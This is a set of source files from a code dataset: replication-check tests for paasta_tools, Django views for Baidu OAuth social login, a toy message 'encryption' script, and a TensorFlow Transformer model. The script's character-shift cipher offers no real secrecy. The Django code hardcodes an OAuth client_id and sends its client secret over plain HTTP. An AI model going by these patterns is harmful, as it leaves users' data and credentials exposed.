replication_checker=None,\n )\n\n\ndef test_check_service_replication_for_smartstack_with_different_namespace(\n instance_config,\n):\n instance_config.get_instances.return_value = 100\n all_tasks = []\n with mock.patch(\n \"paasta_tools.check_marathon_services_replication.get_proxy_port_for_instance\",\n autospec=True,\n return_value=666,\n ), mock.patch(\n \"paasta_tools.monitoring_tools.check_replication_for_instance\", autospec=True,\n ) as mock_check_replication_for_service, mock.patch(\n 
\"paasta_tools.check_marathon_services_replication.check_healthy_marathon_tasks_for_service_instance\",\n autospec=True,\n ) as mock_check_healthy_marathon_tasks:\n instance_config.get_registrations.return_value = [\"some-random-other-namespace\"]\n check_marathon_services_replication.check_service_replication(\n instance_config=instance_config,\n all_tasks_or_pods=all_tasks,\n replication_checker=None,\n )\n assert not mock_check_replication_for_service.called\n mock_check_healthy_marathon_tasks.assert_called_once_with(\n instance_config=instance_config, expected_count=100, all_tasks=[]\n )\n\n\ndef test_check_service_replication_for_non_smartstack(instance_config):\n instance_config.get_instances.return_value = 100\n\n with mock.patch(\n \"paasta_tools.check_marathon_services_replication.get_proxy_port_for_instance\",\n autospec=True,\n return_value=None,\n ), mock.patch(\n \"paasta_tools.check_marathon_services_replication.check_healthy_marathon_tasks_for_service_instance\",\n autospec=True,\n ) as mock_check_healthy_marathon_tasks:\n check_marathon_services_replication.check_service_replication(\n instance_config=instance_config,\n all_tasks_or_pods=[],\n replication_checker=None,\n )\n mock_check_healthy_marathon_tasks.assert_called_once_with(\n instance_config=instance_config, expected_count=100, all_tasks=[]\n )\n\n\ndef _make_fake_task(app_id, **kwargs):\n kwargs.setdefault(\"started_at\", datetime(1991, 7, 5, 6, 13, 0, tzinfo=timezone.utc))\n return mock.Mock(app_id=app_id, **kwargs)\n\n\ndef test_filter_healthy_marathon_instances_for_short_app_id_correctly_counts_alive_tasks():\n fakes = []\n for i in range(0, 4):\n fake_task = _make_fake_task(f\"/service.instance.foo{i}.bar{i}\")\n mock_result = mock.Mock(alive=i % 2 == 0)\n fake_task.health_check_results = [mock_result]\n fakes.append(fake_task)\n actual = check_marathon_services_replication.filter_healthy_marathon_instances_for_short_app_id(\n app_id=\"service.instance\", all_tasks=fakes\n )\n assert actual == 2\n\n\ndef test_filter_healthy_marathon_instances_for_short_app_id_considers_new_tasks_not_healthy_yet():\n one_minute = timedelta(minutes=1)\n fakes = []\n for i in range(0, 4):\n fake_task = _make_fake_task(\n f\"/service.instance.foo{i}.bar{i}\",\n # when i == 0, produces a task that has just started (not healthy yet)\n # otherwise produces a task that was started over a minute ago (healthy)\n started_at=datetime.now(timezone.utc) - one_minute * i,\n )\n\n mock_result = mock.Mock(alive=True)\n fake_task.health_check_results = [mock_result]\n fakes.append(fake_task)\n actual = check_marathon_services_replication.filter_healthy_marathon_instances_for_short_app_id(\n all_tasks=fakes, app_id=\"service.instance\"\n )\n assert actual == 3\n\n\ndef test_get_healthy_marathon_instances_for_short_app_id_considers_none_start_time_unhealthy():\n fake_task = _make_fake_task(\"/service.instance.foo.bar\", started_at=None)\n mock_result = mock.Mock(alive=True)\n fake_task.health_check_results = [mock_result]\n fakes = [fake_task]\n actual = check_marathon_services_replication.filter_healthy_marathon_instances_for_short_app_id(\n all_tasks=fakes, app_id=\"service.instance\"\n )\n assert actual == 0\n\n\n@mock.patch(\n \"paasta_tools.monitoring_tools.send_replication_event_if_under_replication\",\n autospec=True,\n)\n@mock.patch(\n \"paasta_tools.check_marathon_services_replication.filter_healthy_marathon_instances_for_short_app_id\",\n autospec=True,\n) # noqa\ndef test_check_healthy_marathon_tasks_for_service_instance(\n 
mock_healthy_instances,\n mock_send_replication_event_if_under_replication,\n instance_config,\n):\n mock_healthy_instances.return_value = 2\n check_marathon_services_replication.check_healthy_marathon_tasks_for_service_instance(\n instance_config=instance_config, expected_count=10, all_tasks=mock.Mock()\n )\n mock_send_replication_event_if_under_replication.assert_called_once_with(\n instance_config=instance_config, expected_count=10, num_available=2\n )\n","sub_path":"tests/test_check_marathon_services_replication.py","file_name":"test_check_marathon_services_replication.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"327016524","text":"# coding=utf-8\n# Date:2014/7/25\n# Email:wangjian2254@gmail.com\nimport json\nimport urllib\nimport urllib2\nimport time\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth import login as auth_login\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.utils import timezone\n\n\n# from riliusers.views_user import setLoginOrg\nfrom needserver.jifenutil import create_data_jifen\nfrom needserver.models import Social, Project, Person, Group\nfrom util.jsonresult import getResult\nfrom util.loginrequired import client_login_required, client_login_required_widthout_tel\nfrom Need_Server.settings import BAE_AK, BAE_SK, FENXIANG\n\n__author__ = u'王健'\n\n\ndef client_social_callback(request):\n \"\"\"\n 手机端 社会化注册\n by:王健 at:2015-1-15\n 手机端 社会化注册,优化\n by:王健 at:2015-1-25\n :param request:\n :return:\n \"\"\"\n result, social = social_callback(request, 'client')\n if result:\n return HttpResponseRedirect('/ns/client_social_result?result=true&media_type=%s&media_uid=%s&key=%s' % (social.media_type, social.media_uid, social.expires_in))\n\n else:\n return HttpResponseRedirect('/ns/client_social_result?result=false')\n\n\ndef client_social_result(request):\n \"\"\"\n 手机端 社会化注册, 结果页\n by:王健 at:2015-1-25\n :param request:\n :return:\n \"\"\"\n return HttpResponse()\n\n\n\ndef client_add_social_callback(request):\n \"\"\"\n 手机端 ���会化账号 绑定\n by:王健 at:2015-1-15\n 手机端 社会化绑定,优化\n by:王健 at:2015-1-25\n :param request:\n :return:\n \"\"\"\n result, social = social_callback(request, 'client_add')\n # result, social = social_callback(request, 'client')\n if result:\n return HttpResponseRedirect('/ns/client_social_result?result=true&media_type=%s&media_uid=%s&key=%s' % (social.media_type, social.media_uid, social.expires_in))\n\n else:\n return HttpResponseRedirect('/ns/client_social_result?result=false')\n\n\n\ndef web_social_callback(request):\n \"\"\"\n web端社会化注册\n by:王健 at:2015-1-15\n :param request:\n :return:\n \"\"\"\n result, social = social_callback(request, 'web')\n if result:\n if social.user.tel == None:\n return HttpResponseRedirect('/web/reg_tel')\n else:\n return HttpResponseRedirect('/web/')\n else:\n return HttpResponseRedirect(social)\n\n\n@client_login_required\ndef web_add_social_callback(request):\n \"\"\"\n web端社会化,绑定社会化账号\n by:王健 at:2015-1-16\n :param request:\n :return:\n \"\"\"\n result, social = social_callback(request, 'web_add')\n if result:\n return HttpResponseRedirect('/web/')\n else:\n return HttpResponseRedirect(social)\n\n\ndef social_callback(request, client='client'):\n \"\"\"\n 社会化登陆的回调接口\n by:王健 at:2015-1-3\n 设置失败后的 url,不同的客户端有不同的url\n by:王健 at:2015-1-15\n 防止None被split\n by:王健 at:2015-3-18\n 解决百度社会化登陆问题\n by:尚宗凯 at:2015-4-1\n 百度社会化登陆去掉头像设置\n by:尚宗凯 at:2015-4-1\n 根据客户端访问的 host变化\n by:尚宗凯 at:2015-4-3\n 
:param request:\n :return:\n \"\"\"\n code = request.REQUEST.get('code')\n state = request.REQUEST.get('state', '')\n url = 'http://openapi.baidu.com/social/oauth/2.0/token'\n host = request.META.get('HTTP_HOST', '').lower()\n values = {'grant_type': 'authorization_code',\n 'code': code,\n 'client_id': BAE_AK,\n 'client_secret': BAE_SK,\n # 'redirect_uri': 'http://needserver.duapp.com/ns/%s_social_callback' % client}\n 'redirect_uri': 'http://%s/ns/%s_social_callback' % (host, client)\n }\n\n timeline = int(time.mktime(timezone.now().timetuple()))\n data = urllib.urlencode(values)\n req = urllib2.Request(url, data)\n response = urllib2.urlopen(req)\n html = response.read()\n result = json.loads(html)\n if result.has_key(\"error_code\"):\n url = 'https://openapi.baidu.com/social/oauth/2.0/authorize?response_type=code&state=%s&client_id=SyeExPLiXrkTwBK9GUYFLAok&redirect_uri=http://%s/ns/%s_social_callback&media_type=%s' % (\n state, host, client, state.split('_')[0])\n return False, url\n\n\n #判断是否已经具有社会化登陆了,没有就新建\n if not Social.objects.filter(media_type=result.get('media_type'), media_uid=result.get('media_uid'),\n social_uid=result.get('social_uid')).exists():\n if request.user.is_authenticated():\n user = request.user\n else:\n user = get_user_model()()\n user.name = result.get('name')\n user.save()\n social = Social()\n social.user = user\n social.token = result.get('access_token')\n social.expires_in = timeline + result.get('expires_in', 0)\n social.media_type = result.get('media_type')\n social.media_uid = result.get('media_uid')\n social.social_uid = result.get('social_uid')\n social.session_key = result.get('session_key')\n social.session_secret = result.get('session_secret')\n social.save()\n else:\n social = Social.objects.get(media_type=result.get('media_type'), media_uid=result.get('media_uid'),\n social_uid=result.get('social_uid'))\n social.token = result.get('access_token')\n social.expires_in = timeline + result.get('expires_in', 0)\n social.session_key = result.get('session_key')\n social.session_secret = result.get('session_secret')\n social.save()\n user = social.user\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n auth_login(request, user)\n # 判断是否带有 邀请标记,带有的话,就加入对应项目的root组\n if state.find('_project_') > 0 and len(state.split('_project_')) == 2:\n flag = state.split('_project_')[1]\n orgquery = Project.objects.filter(flag=flag)\n if orgquery.exists():\n org = orgquery[0]\n if Person.objects.filter(user=user, project=org, is_active=True).count() == 0:\n person, created = Person.objects.get_or_create(user=request.user, org=org)\n person.is_active = True\n person.save()\n group = Group.objects.get(project=org, flag='root')\n group.look_members.add(request.user)\n group.save()\n #如果用户没有头像,给用户下载一个头像\n # if not user.icon_url:\n # userinfo_url = 'https://openapi.baidu.com/social/api/2.0/user/info?access_token=%s' % result.get('access_token')\n # response_userinfo = urllib2.urlopen(userinfo_url)\n # html_userinfo = response_userinfo.read()\n # result_userinfo = json.loads(html_userinfo)\n # if result_userinfo.has_key('tinyurl'):\n # user.icon_url = result_userinfo.get('tinyurl')\n # user.save()\n\n\n return True, social\n\n\n\n@client_login_required\ndef get_user_social_list(request):\n p = []\n for social in request.user.social_set.all():\n p.append({'type': social.media_type, 'time': social.expires_in, 'token': social.token})\n return getResult(True, '', p)\n\n\n@client_login_required\ndef send_social_success(request):\n \"\"\"\n 分享社交软件获取积分\n by:王健 at:2015-2-5\n 
:param request:\n :return:\n \"\"\"\n return getResult(True, '', None, jifen=create_data_jifen(request, FENXIANG))\n\n#\n# @client_login_required\n# def add_social_callback(request):\n# code = request.REQUEST.get('code')\n# state = request.REQUEST.get('state')\n# url = 'http://openapi.baidu.com/social/oauth/2.0/token'\n# values = {'grant_type': 'authorization_code',\n# 'code': code,\n# 'client_id': BAE_AK,\n# 'client_secret': BAE_SK,\n# 'redirect_uri': 'http://liyuoa.duapp.com/riliusers/add_social_callback'}\n# timeline = int(time.mktime(timezone.now().timetuple()))\n# data = urllib.urlencode(values)\n# req = urllib2.Request(url, data)\n# response = urllib2.urlopen(req)\n# html = response.read()\n# result = json.loads(html)\n# if state.find('_user_') > 0 and len(state.split('_user_')) == 2:\n# flag = state.split('_user_')[1]\n# if result.has_key(\"error_code\"):\n# url = 'https://openapi.baidu.com/social/oauth/2.0/authorize?response_type=code&state=%s&client_id=SyeExPLiXrkTwBK9GUYFLAok&redirect_uri=http://liyuoa.duapp.com/riliusers/add_social_callback&media_type=%s&t=%s' % (\n# state, state.split('_')[0],timeline)\n# # return HttpResponse(u'请先登录账号,再绑定社交账号。继续 %s'% (url, result.get('error_code')))\n# return HttpResponseRedirect(url)\n# try:\n# social = Social.objects.get(social_uid=result.get('social_uid'))\n# except:\n# social = Social()\n# social.user = chatlogin.person.user\n# # social, created = Social.objects.get_or_create(user_id=chatlogin.person.user_id,\n# # media_type=result.get('media_type'),\n# # media_uid=result.get('media_uid'),\n# # social_uid=result.get('social_uid'))\n# if social.user == chatlogin.person.user:\n# user = social.user\n# social.token = result.get('access_token')\n# social.expires_in = timeline + result.get('expires_in', 0)\n# social.media_type = result.get('media_type')\n# social.media_uid = result.get('media_uid')\n# social.social_uid = result.get('social_uid')\n# social.session_key = result.get('session_key')\n# social.session_secret = result.get('session_secret')\n# social.save()\n# else:\n# return HttpResponse(u'该社交账号已经,绑定了另外一个账号。返回首页'% request.get_host())\n# if not user.icon:\n# userinfo_url = 'https://openapi.baidu.com/social/api/2.0/user/info?access_token=%s' % result.get('access_token')\n# response_userinfo = urllib2.urlopen(userinfo_url)\n# html_userinfo = response_userinfo.read()\n# result_userinfo = json.loads(html_userinfo)\n# if result_userinfo.has_key('tinyurl'):\n# user.icon = result_userinfo.get('tinyurl')\n# user.save()\n# for p in user.person_set.all():\n# if not p.icon:\n# p.icon = user.icon\n# p.save()\n# from util.jsonresult import cache\n# import uuid\n# uuid_flag = str(uuid.uuid4())\n# cache.set(uuid_flag, social.social_uid, 60 * 10)\n# return HttpResponseRedirect('/?uuid_flag=%s' % uuid_flag)\n\n#\n# @client_login_required\n# def add_social_code(request):\n# media_type = request.REQUEST.get('media_type')\n# from util.jsonresult import cache\n# import uuid\n#\n# uuid_flag = str(uuid.uuid4())\n# cache.set(uuid_flag, request.user.id, 60 * 10)\n# url = 'https://openapi.baidu.com/social/oauth/2.0/authorize?response_type=code&state=%s_user_%s&client_id=SyeExPLiXrkTwBK9GUYFLAok&redirect_uri=http://liyuoa.duapp.com/riliusers/add_social_callback&media_type=%s' % (\n# media_type, uuid_flag, media_type)\n# return HttpResponseRedirect(url)\n\n#\n# def assk_callback(request):\n# return getResult(True, '', \"assk_callback\")\n#\n#\n# def third_callback(request):\n# return getResult(True, '', \"third_callback\")\n#\n#\n# def yanzheng(request):\n# return 
HttpResponse('87407z1pWYlOEwXaITaLuFVzBlA')","sub_path":"needserver/views_social.py","file_name":"views_social.py","file_ext":"py","file_size_in_byte":11733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"82678575","text":"#The program simply encrypts or decrypts your plain text messages!\r\nclass EncDec:\r\n #Function for the encryption process\r\n def Encodes():\r\n messageenc = input(\"Message: \")\r\n tempenc = messageenc\r\n messageenc = list(tempenc)#Adding the message to the list\r\n conversionenc = [ord(ch) for ch in messageenc]#Converting to ASCII numbers\r\n conversionenc1 = [(i + 101) for i in conversionenc]\r\n conversionenc = [(i * sec) for i in conversionenc1]\r\n conversionenc = [chr(ch) for ch in conversionenc]#Converting back to utf-8\r\n conversionenc = ''.join(str(e) for e in conversionenc)#Removing the brackets\r\n print(conversionenc)\r\n print('\\tCopy the above text and send to decrypt!\\n')\r\n print (\"-----------------------------------------------------------\")\r\n return\r\n #Function for the decryption process\r\n def Decodes():\r\n messagedec = input(\"Message: \")\r\n tempdec = messagedec\r\n messagedec = list(tempdec)#Adding the message to list\r\n conversiondec = [ord(ch) for ch in messagedec]#Converting to ASCII\r\n conversiondec2 = [(j // sec) for j in conversiondec]\r\n conversiondec = [(j - 101) for j in conversiondec2]\r\n conversiondec = [chr(ch) for ch in conversiondec]#Converting back to utf-8\r\n conversiondec = ''.join(str(e) for e in conversiondec)#Removing the brackets\r\n print(conversiondec)\r\n print('\\tYour message is displayed above.\\n')\r\n print (\"-----------------------------------------------------------\")\r\n return\r\n\r\n print(\"\\tWelcome to Cryptography\\n\")\r\n print('\\n')\r\n print(\"Make sure you have all the fonts installed in your system so that there is no any problem while encryption/decryption process.\")\r\n print()\r\n print(\"The key is the same through the process. Make sure you and your partner use the same key.\")\r\n print()\r\n #sec = int(input(\"Enter the secret key: \"))\r\n global sec #Making the variable global so it can be used to use as a key in enc/dec process\r\n sec = int(input(\"Enter the secret key: \"))\r\n looping = 1\r\n while (looping == 1):#For continuation of the program without exiting\r\n option = input(\"Encrypt, Decrypt or Exit? 
[e/d/x]\")\r\n        if ((option == 'e') or (option == 'E')):\r\n            Encodes()\r\n        elif ((option == 'd') or (option == 'D')):\r\n            Decodes()\r\n        elif ((option == 'x') or (option == 'X')):\r\n            print(\"Exiting....\")\r\n            break\r\n        else:\r\n            print(\"Invalid key pressed!\\n\")\r\n            print()\r\n    exit() #Exits the program\r\n\r\n","sub_path":"CryptoFunction.py","file_name":"CryptoFunction.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}{"seq_id":"48825253","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/4/22 16:28\n# @Author : zdqzyx\n# @File : modeling.py\n# @Software: PyCharm\n\nimport tensorflow as tf\nimport numpy as np\n\ndef get_angles(pos, i, d_model):\n    '''\n    :param pos: position of the token within the sentence\n    :param i: index along the embedding dimension\n    :param d_model: size of the embedding dimension\n    :return:\n    '''\n    angle_rates = 1 / np.power(10000, (2 * (i//2)) / np.float32(d_model))\n    return pos * angle_rates\n\ndef positional_encoding(position, d_model):\n    '''\n    :param position: maximum position\n    :param d_model: size of the embedding dimension\n    :return: [1, position, d_model]; summed with the embedding matrix afterwards\n    '''\n    angle_rads = get_angles(np.arange(position)[:, np.newaxis],\n                            np.arange(d_model)[np.newaxis, :],\n                            d_model)\n    # apply sin to even indices in the array; 2i\n    angle_rads[:, 0::2] = np.sin(angle_rads[:, 0::2])\n    # apply cos to odd indices in the array; 2i+1\n    angle_rads[:, 1::2] = np.cos(angle_rads[:, 1::2])\n    pos_encoding = angle_rads[np.newaxis, ...]\n    return tf.cast(pos_encoding, dtype=tf.float32)\n\ndef point_wise_feed_forward_network(d_model, dff):\n    return tf.keras.Sequential([\n        tf.keras.layers.Dense(dff, activation='relu'), # (batch_size, seq_len, dff)\n        tf.keras.layers.Dense(d_model) # (batch_size, seq_len, d_model)\n    ])\n\n\ndef scaled_dot_product_attention(q, k, v, mask=None):\n    '''Compute attention.\n    q, k and v must share the same leading dimensions;\n    q and k must share the same last dimension;\n    k and v must match in the second-to-last dimension, seq_len_k = seq_len_v = seq_len.\n    Args:\n    q: query, shape == (..., seq_len_q, d)\n    k: key, shape == (..., seq_len, d)\n    v: value, shape == (..., seq_len, d_v)\n    mask: float tensor broadcastable to (..., seq_len_q, seq_len). Defaults to None.\n    Returns:\n    output, attention weights\n    '''\n    # (batch_size, num_heads, seq_len_q, d) dot (batch_size, num_heads, d, seq_len) = (batch_size, num_heads, seq_len_q, seq_len)\n    matmul_qk = tf.matmul(q, k, transpose_b=True)\n\n    # scale matmul_qk\n    dk = tf.cast(tf.shape(k)[-1], dtype=tf.float32)\n    scaled_attention_logits = matmul_qk/tf.math.sqrt(dk)\n\n    # add the mask to the scaled tensor\n    if mask is not None:\n        # (batch_size, num_heads, seq_len_q, seq_len) + (batch_size, 1, 1, seq_len)\n        scaled_attention_logits += (mask * -1e9)\n\n    # normalize the weights with softmax (batch_size, num_heads, seq_len_q, seq_len)\n    attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1)\n\n    # a weighted sum over v for each of the seq_len_q positions\n    # (batch_size, num_heads, seq_len_q, seq_len) dot (batch_size, num_heads, seq_len, d_v) = (batch_size, num_heads, seq_len_q, d_v)\n    output = tf.matmul(attention_weights, v)\n    return output, attention_weights\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n\n    def __init__(self, d_model, num_heads):\n        super(MultiHeadAttention, self).__init__()\n        assert (d_model > num_heads) and (d_model % num_heads == 0)\n        self.d_model = d_model\n        self.num_heads = num_heads\n        self.depth = d_model // num_heads\n\n        self.qw = tf.keras.layers.Dense(d_model)\n        self.kw = tf.keras.layers.Dense(d_model)\n        self.vw = tf.keras.layers.Dense(d_model)\n        self.dense = tf.keras.layers.Dense(d_model)\n\n    def split_heads(self, x, batch_size):\n
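        # Reshape (batch_size, seq_len, d_model) -> (batch_size, seq_len, num_heads, depth) and then\n        # swap the sequence and head axes, so each head attends over the whole sequence independently.\n        x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) # (batch_size, seq_len, num_heads, depth)\n        return tf.transpose(x, 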
perm=(0, 2, 1, 3)) # (batch_size, num_heads, seq_len, depth)\n\n\n    def call(self, v, k, q, mask=None):\n        # v = inputs\n        batch_size = tf.shape(q)[0]\n\n        q = self.qw(q) # (batch_size, seq_len_q, d_model)\n        k = self.kw(k) # (batch_size, seq_len, d_model)\n        v = self.vw(v) # (batch_size, seq_len, d_model)\n\n        q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth)\n        k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len, depth)\n        v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len, depth_v)\n\n        # scaled_attention, (batch_size, num_heads, seq_len_q, depth_v)\n        # attention_weights, (batch_size, num_heads, seq_len_q, seq_len)\n        scaled_attention, attention_weights = scaled_dot_product_attention(q, k, v, mask)\n\n        scaled_attention = tf.transpose(scaled_attention, perm=(0, 2, 1, 3)) # (batch_size, seq_len_q, num_heads, depth_v)\n        concat_attention = tf.reshape(scaled_attention, shape=(batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model)\n\n        output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model)\n        return output, attention_weights\n\nclass EncoderLayer(tf.keras.layers.Layer):\n    '''Encoder block\n    Two sublayers: 1. multi-head attention (with padding mask); 2. point-wise feed-forward network.\n    out1 = BatchNormalization( x + (MultiHeadAttention(x, x, x) => dropout) )\n    out2 = BatchNormalization( out1 + (ffn(out1) => dropout) )\n    '''\n    def __init__(self, d_model, num_heads, dff, rate=0.1):\n        super(EncoderLayer, self).__init__()\n        self.mha = MultiHeadAttention(d_model=d_model, num_heads=num_heads)\n        self.ffn = point_wise_feed_forward_network(d_model, dff)\n        self.layer_norm1 = tf.keras.layers.BatchNormalization(epsilon=1e-6)\n        self.layer_norm2 = tf.keras.layers.BatchNormalization(epsilon=1e-6)\n        self.dropout1 = tf.keras.layers.Dropout(rate)\n        self.dropout2 = tf.keras.layers.Dropout(rate)\n\n    def call(self, x, training, mask):\n        attn_output, _ = self.mha(x, x, x, mask) # (batch_size, input_seq_len, d_model)\n        attn_output = self.dropout1(attn_output, training=training)\n        out1 = self.layer_norm1(x+attn_output) # (batch_size, input_seq_len, d_model)\n\n        ffn_output = self.ffn(out1) # (batch_size, input_seq_len, d_model)\n        ffn_output = self.dropout2(ffn_output, training=training)\n        out2 = self.layer_norm2(out1+ffn_output) # (batch_size, input_seq_len, d_model)\n        return out2\n
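\n# Note: EncoderLayer above normalizes with BatchNormalization while DecoderLayer below uses\n# LayerNormalization; the standard Transformer applies LayerNormalization in both blocks.\n\nclass DecoderLayer(tf.keras.layers.Layer):\n    ''' Decoder block\n    Required sublayers:\n    1. masked multi-head attention (look-ahead mask plus padding mask)\n    2. multi-head attention (with padding mask); V (value) and K (key) take the encoder output as input, while Q (query) takes the output of the masked multi-head attention sublayer\n    3. 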
point-wise feed-forward network\n    out1 = LayerNormalization( x + (MultiHeadAttention(x, x, x) => dropout) )\n    out2 = LayerNormalization( out1 + (MultiHeadAttention(enc_output, enc_output, out1) => dropout) )\n    out3 = LayerNormalization( out2 + (ffn => dropout) )\n    '''\n    def __init__(self, d_model, num_heads, dff, rate=0.1):\n        super(DecoderLayer, self).__init__()\n\n        self.mha1 = MultiHeadAttention(d_model, num_heads)\n        self.mha2 = MultiHeadAttention(d_model, num_heads)\n\n        self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n        self.layer_norm1 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n        self.layer_norm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n        self.layer_norm3 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n\n        self.dropout1 = tf.keras.layers.Dropout(rate)\n        self.dropout2 = tf.keras.layers.Dropout(rate)\n        self.dropout3 = tf.keras.layers.Dropout(rate)\n\n    def call(self, x, enc_output, training, look_ahead_mask, padding_mask):\n        # x.shape == (batch_size, target_seq_len, d_model)\n        # enc_output.shape == (batch_size, input_seq_len, d_model)\n        attn1, attn_weights_block1 = self.mha1(x, x, x, look_ahead_mask) # (batch_size, target_seq_len, d_model)\n        attn1 = self.dropout1(attn1, training=training)\n        out1 = self.layer_norm1(x+attn1)\n\n        attn2, attn_weights_block2 = self.mha2(enc_output, enc_output, out1, padding_mask) # (batch_size, target_seq_len, d_model)\n        attn2 = self.dropout2(attn2, training=training)\n        out2 = self.layer_norm2(out1+attn2)\n\n        ffn_output = self.ffn(out2)\n        ffn_output = self.dropout3(ffn_output, training=training)\n        out3 = self.layer_norm3(out2+ffn_output) # (batch_size, target_seq_len, d_model)\n\n        return out3, attn_weights_block1, attn_weights_block2\n\nclass Encoder(tf.keras.layers.Layer):\n    '''\n    Input embedding\n    Positional encoding\n    N encoder layers\n    After the input is embedded, the embedding is summed with the positional encoding; the result is the input of the encoder layers, and the encoder output is the decoder's input.\n    '''\n    def __init__(self, num_layers, d_model, num_heads, dff, input_vocab_size, maximum_position_encoding, rate=0.1):\n        super(Encoder, self).__init__()\n        self.d_model = d_model\n        self.num_layers = num_layers\n        self.embedding = tf.keras.layers.Embedding(input_vocab_size, d_model)\n        self.pos_encoding = positional_encoding(maximum_position_encoding, d_model)\n\n        self.enc_layer = [EncoderLayer(d_model, num_heads, dff, rate) for _ in range(num_layers)]\n        self.dropout = tf.keras.layers.Dropout(rate)\n\n    def call(self, x, training, mask):\n        # x.shape == (batch_size, seq_len)\n        seq_len = tf.shape(x)[1]\n        x = self.embedding(x) # (batch_size, input_seq_len, d_model)\n        x *= tf.math.sqrt(tf.cast(self.d_model, dtype=tf.float32))\n        x += self.pos_encoding[:, :seq_len, :]\n\n        x = self.dropout(x, training=training)\n\n        for i in range(self.num_layers):\n            x = self.enc_layer[i](x, training, mask)\n        return x #(batch_size, input_seq_len, d_model)\n\nclass Decoder(tf.keras.layers.Layer):\n    '''The decoder consists of:\n    Output embedding\n    Positional encoding\n    N decoder layers\n    After the target is embedded, the embedding is summed with the positional encoding; the result is the input of the decoder layers, and the decoder output is the input of the final linear layer.\n    '''\n    def __init__(self, num_layers, d_model, num_heads, dff, target_vocab_size, maximum_position_encoding, rate=0.1):\n        super(Decoder, self).__init__()\n        self.d_model = d_model\n        self.num_layers = num_layers\n\n        self.embedding = tf.keras.layers.Embedding(target_vocab_size, d_model)\n        self.pos_encoding = positional_encoding(maximum_position_encoding, d_model)\n        self.dec_layer = [DecoderLayer(d_model, num_heads, dff, rate) for _ in range(num_layers)]\n        self.dropout = tf.keras.layers.Dropout(rate)\n
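\n        # (Note: the plain Python lists used for enc_layer/dec_layer are still tracked by Keras\n        # attribute tracking in TF 2.x, so the sublayers' weights are registered with the model.)\n\n    def call(self, x, enc_output, 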
training, look_ahead_mask, padding_mask):\n        # x.shape==(batch_size, target_seq_len)\n        # enc_output.shape==(batch_size, input_seq_len, d_model)\n        seq_len = tf.shape(x)[1]\n        attention_weights = {}\n\n        x = self.embedding(x) # (batch_size, target_seq_len, d_model)\n        x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))\n        x += self.pos_encoding[:, :seq_len, :]\n        x = self.dropout(x, training=training)\n\n        for i in range(self.num_layers):\n            x, block1, block2 = self.dec_layer[i](x, enc_output, training, look_ahead_mask, padding_mask)\n            attention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\n            attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n        # x.shape==(batch_size, target_seq_len, d_model)\n        return x, attention_weights\n\n\nclass Transformer(tf.keras.Model):\n    def __init__(self, params):\n        super(Transformer, self).__init__()\n        self.encoder = Encoder(params['num_layers'],params['d_model'],params['num_heads'],params['dff'],params['input_vocab_size'],params['pe_input'],params['rate'])\n        self.decoder = Decoder(params['num_layers'],params['d_model'],params['num_heads'],params['dff'],params['target_vocab_size'],params['pe_target'],params['rate'])\n        self.final_layer = tf.keras.layers.Dense(params['target_vocab_size'])\n\n    def call(self, inp, tar, training, enc_padding_mask=None, look_ahead_mask=None, dec_padding_mask=None):\n        # (batch_size, inp_seq_len, d_model)\n        enc_output = self.encoder(inp, training, enc_padding_mask)\n        # (batch_size, tar_seq_len, d_model)\n        dec_output, attention_weights = self.decoder(tar, enc_output, training, look_ahead_mask, dec_padding_mask)\n        final_output = self.final_layer(dec_output) # (batch_size, tar_seq_len, target_vocab_size)\n        return final_output, attention_weights\n\n    def build_graph(self, input_shape, target_shape):\n        input_shape_nobatch = input_shape[1:]\n        self.build(input_shape)\n        inputs = tf.keras.Input(shape=input_shape_nobatch)\n        if not hasattr(self, 'call'):\n            raise AttributeError(\"User should define 'call' method in sub-class model!\")\n        _ = self.call(inputs)\n\n\n\nif __name__=='__main__':\n    params = {\n        'num_layers':2,\n        'd_model':512,\n        'num_heads' :8,\n        'dff' :2048,\n        'input_vocab_size' : 8500,\n        'target_vocab_size' :8000,\n        'pe_input' :10000,\n        'pe_target' : 6000,\n        'rate':0.1\n    }\n\n    model = Transformer(params)\n    # model.build_graph(input_shape=(None, 400))\n    # model.summary()\n    temp_input = tf.random.uniform((64, 62))\n    temp_target = tf.random.uniform((64, 26))\n\n    fn_out, _ = model(temp_input, temp_target, training=True,\n                      enc_padding_mask=None,\n                      look_ahead_mask=None,\n                      dec_padding_mask=None)\n
